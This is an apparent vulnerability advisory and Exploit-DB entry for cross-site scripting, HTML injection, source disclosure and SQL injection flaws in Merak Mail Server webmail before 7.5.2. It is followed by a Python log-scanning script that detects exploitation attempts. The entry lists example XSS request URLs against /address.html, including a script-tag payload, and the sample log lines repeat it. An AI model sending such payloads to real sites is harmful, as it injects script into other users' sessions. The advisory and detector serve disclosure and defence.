Vendor: Webmail Package
CVSS: 7.5 (HIGH)
Cross-site scripting, HTML injection, PHP source code disclosure, SQL injection
CWE: 79, 80, 98, 89
Product Name: Webmail Package
Affected Version From: Prior to 7.5.2
Affected Version To: 7.5.2002
Patch Exists: YES

Multiple Vulnerabilities in Merak Mail Server Webmail Package

The webmail package embedded in Merak Mail Server is prone to multiple vulnerabilities, including cross-site scripting, HTML injection, PHP source code disclosure, and SQL injection. These vulnerabilities allow attackers to execute arbitrary script code in the context of the affected site, inject malicious HTML code, disclose sensitive PHP source code, and manipulate SQL queries.

Mitigation:

Upgrade to version 7.5.2 or later.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10966/info

The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.

The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability

These vulnerabilities are reported to exist in versions prior to 7.5.2.

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
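
For sites still reviewing traffic from before the upgrade to 7.5.2, the parameter list above can be turned into a log check. The following is an added example, not part of the original advisory or of the product: it flags access-log entries for /address.html where one of the listed parameters carries markup characters. The combined log format, the function names and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameters of /address.html that appear in the report's example requests.
LISTED_PARAMS = {"category", "cserver", "ext", "global", "showgroups", "showlite"}
# Characters that close an HTML attribute value or open a tag.
MARKUP = re.compile(r'["<>]')
# Request target inside a common/combined-format log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Some servers write a raw double quote in the log as \x22 (others as \").
LOG_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')

def flagged_params(log_line):
    """Return the listed parameters whose decoded value contains markup characters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    # Undo \xHH log escaping, then split path and query without raising on odd input.
    target = LOG_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), match.group(1))
    path, _, query = target.partition("?")
    if not path.lower().endswith("/address.html"):
        return []
    # parse_qsl percent-decodes values, so %22%3E is seen as "> here.
    hits = {name.lower()
            for name, value in parse_qsl(query, keep_blank_values=True)
            if name.lower() in LISTED_PARAMS and MARKUP.search(value)}
    return sorted(hits)

def scan(lines):
    """Return (line_number, flagged_parameters) for every entry worth reviewing."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := flagged_params(line))]

# Constructed sample entries (documentation addresses, placeholder id value).
SAMPLE_LOG = [
    r'192.0.2.10 - - [12/Mar/2024:09:14:55 +0000] "GET /address.html?id=abc&sort=name&category=%22%3E%3Cscript%3Ealert()%3C/script%3E&cserver=&ext= HTTP/1.1" 200 5120',
    r'192.0.2.11 - - [12/Mar/2024:09:15:01 +0000] "GET /address.html?id=abc&sort=name&category=Friends&cserver=&ext= HTTP/1.1" 200 4980',
    r'198.51.100.9 - - [12/Mar/2024:09:15:07 +0000] "GET /address.html?id=abc&global=\x22>&showlite=\"> HTTP/1.1" 200 5001',
]

if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(params)}")
```

A hit only means the request carried markup in a listed parameter; whether it was reflected depends on the installed version.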